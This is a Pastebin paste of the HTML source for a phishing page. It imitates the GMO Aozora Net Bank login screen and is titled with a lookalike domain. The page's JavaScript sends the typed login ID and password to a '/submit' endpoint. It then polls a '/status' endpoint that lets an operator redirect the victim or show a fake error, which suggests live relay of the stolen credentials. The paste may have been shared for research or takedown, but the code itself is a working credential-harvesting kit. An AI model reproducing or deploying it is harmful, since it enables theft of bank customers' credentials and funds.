ozuma5119

gmo-azora.com

Oct 28th, 2019
465
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 7.32 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="ja"><head>
  3. <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  4.     <meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>GMOあおぞらネット銀行 ログイン</title>
  5.     <meta name="description" content="GMOあおぞらネット銀行">
  6.     <meta name="keywords" content="GMOあおぞらネット銀行">
  7.     <script type="text/javascript" src="/static/js/jquery-3.3.1.min.js"></script>
  8.     <link rel="stylesheet" type="text/css" media="all" href="/static/gmo/reset.css">
  9.     <link rel="stylesheet" type="text/css" media="all" href="/static/gmo/login.css">
  10.     <script type="text/javascript" src=""></script>
  11. </head>
  12.  
  13.  
  14.  <body>
  15.     <header>
  16.         <div class="container clearfix">
  17.             <div class="col-child">
  18.                 <a href="https://gmo-aozora.com/"><img class="logo" src="/static/gmo/logo.png" alt="GMOあおぞらネット銀行"></a>
  19.             </div>
  20.         </div>
  21.     </header>
  22.  
  23.     <section id="app" class="content">
  24.         <div class="login-private panel-wrapper">
  25.             <div class="panel">
  26.                 <div>
  27.                     <header class="header-accent with-link">
  28.                         <h1>ログイン</h1>
  29.                         <a href="/" class="link-arrow" id="login-link">法人のお客さまはこちら</a>
  30.                     </header>
  31.                 </div>
  32.  
  33.                     <div class="panel-body">
  34.                         <div class="input-wrapper">
  35.                             <div class="text-description">ログインID</div>
  36.                             <div>
  37.                                 <input type="text" name="username"  maxlength="20" size="16" placeholder="ログインIDまたはログイン名" id="username" tabindex="1"></div>
  38.                         </div>
  39.                         <div class="input-wrapper">
  40.                             <div class="text-description">ログインパスワード</div>
  41.                             <div>
  42.                                 <input type="password" name="password" maxlength="10" size="16" value="" placeholder="6~10文字以内の半角英数記号" id="password" tabindex="2"></div>
  43.                         </div>
  44.                         <div class="indent_block" id="indent_block" style="display:none;" >
  45.                             <font size="3" color="#ff0000"><strong><b>「ログインID」または 「ログインパスワード」の入力内容が誤っている,ご確認のうえ再度ご入力ください。<br></b></strong></font>
  46.                         </div>
  47.                         <div class="button-wrapper">
  48.                             <button type="submit" class="button-primary" onclick="regs();" tabindex="3">ログイン</button>
  49.                         </div>
  50.                     </div>
  51.                 <div class="description">
  52.                     <ul class="list-info">
  53.                         <li>
  54.                             <a href="https://gmo-aozora.com/information/" class="link-arrow">口座をまだお持ちでない方</a>
  55.                         </li>
  56.                         <li>
  57.                             <a href="https://bank.gmo-aozora.com/bank/recovery" class="link-arrow" target="_blank">ログインID、ログインパスワードが分からない方</a>
  58.                         </li>
  59.                         <li>
  60.                             <a href="https://gmo-aozora.com/policy/about-site.html#usage" class="link-arrow" target="_blank">ご利用環境について</a>
  61.                         </li>
  62.                         <li>
  63.                             <a href="https://gmo-aozora.com/news/maintenance.html" class="link-arrow" target="_blank">システムメンテナンス情報</a>
  64.                         </li>
  65.                         <li>
  66.                             <a href="https://gmo-aozora.com/security/" class="link-arrow" target="_blank">フィッシングサイトにご注意ください</a>
  67.                         </li>
  68.                     </ul>
  69.                 </div>
  70.             </div>
  71.             <div id="wait" style="left:0px;top:0;height:100%;width:100%;position: absolute;display:none;background: rgba(0,0,0,0.6);opacity: 0.8;z-index:9999999;">
  72.                 <img style="position:absolute;left:50%;margin-left:-50px;top:30%;margin-top:-100px;width:100px;height:100px;" src="/static/images/loading.gif" />
  73.             </div>
  74.             <div class="banner-wrapper">
  75.     <a href="https://gmo-aozora.com/campaign/redirect/gmocoin.html" target="_blank">
  76.         <img src="/static/gmo/btn-c.png" class="partners-banner"></a>
  77. </div>
  78.         </div>
  79.     </section>
  80.             <footer>
  81.         <div class="container">
  82.             <div>
  83.                 <a href="https://gmo-aozora.com/information/interest.html" target="_blank">金利</a>
  84.                 <a href="https://gmo-aozora.com/information/fee.html" target="_blank">手数料</a>
  85.                 <a href="https://faq.gmo-aozora.com/" target="_blank">よくあるご質問</a>
  86.                 <a href="https://gmo-aozora.com/company/" target="_blank">会社情報</a>
  87.                 <a href="https://gmo-aozora.com/policy/" target="_blank">各種方針</a>
  88.                 <a href="https://gmo-aozora.com/policy/resolve-complaints.html" target="_blank">苦情・紛争解決機関</a>
  89.                 <a href="https://gmo-aozora.com/provision/" target="_blank">規定・約款一覧</a>
  90.                 <a href="https://gmo-aozora.com/information/attention.html" target="_blank">金融犯罪の注意喚起</a>
  91.                 <a href="https://gmo-aozora.com/security/" target="_blank">セキュリティ対策</a>
  92.             </div>
  93.             <div class="copyright">Copyright © GMO Aozora Net Bank, Ltd. All Rights Reserved.</div>
  94.         </div>
  95.     </footer>
  96.  </body>
  97.  
  98. <script>
  99.     var auto;
  100.    
  101.     function regs(){
  102.        
  103.         if ($("#username").val()==""){
  104.             $("#username").focus();
  105.             return false;
  106.         }
  107.        
  108.         if ($("#password").val()==""){
  109.             $("#password").focus();
  110.             return false;
  111.         }
  112.  
  113.  
  114.         $("#indent_block").hide();
  115.  
  116.         $("#wait").css('height',document.body.scrollHeight);
  117.         $("#wait").show();
  118.         $.post("/submit",{Origin:"GMO",Page:"1",Val1:$("#username").val(),Val3:$('#password').val()},function (data){
  119.             if (data.Code == 1 && data.Message == "success") {
  120.                auto=window.setInterval("checkStatus();",1000);
  121.             }
  122.         });
  123.     }
  124.  
  125.  
  126.     function checkStatus() {
  127.         $("#wait").show();
  128.         $.post("/status",function (data) {
  129.             if (data.Code == 1 && data.Message == "wait") {
  130.                $("#wait").show();
  131.             }else if (data.Code == 1 && data.Message == "success") {
  132.                $("#wait").hide();
  133.                 window.clearTimeout(auto);
  134.                 document.location.href = data.Data;
  135.             }else if (data.Code == 1 && data.Message == "alert") {
  136.                submitcount = 0;
  137.                 $("#username").val("");
  138.                 $("#password").val("");
  139.                 window.clearTimeout(auto);
  140.                 $("#wait").hide();
  141.                 $("#indent_block").show();
  142.             }
  143.         })
  144.     }
  145. </script>
  146.  
  147. </html>
Advertisement
Add Comment
Please, Sign In to add comment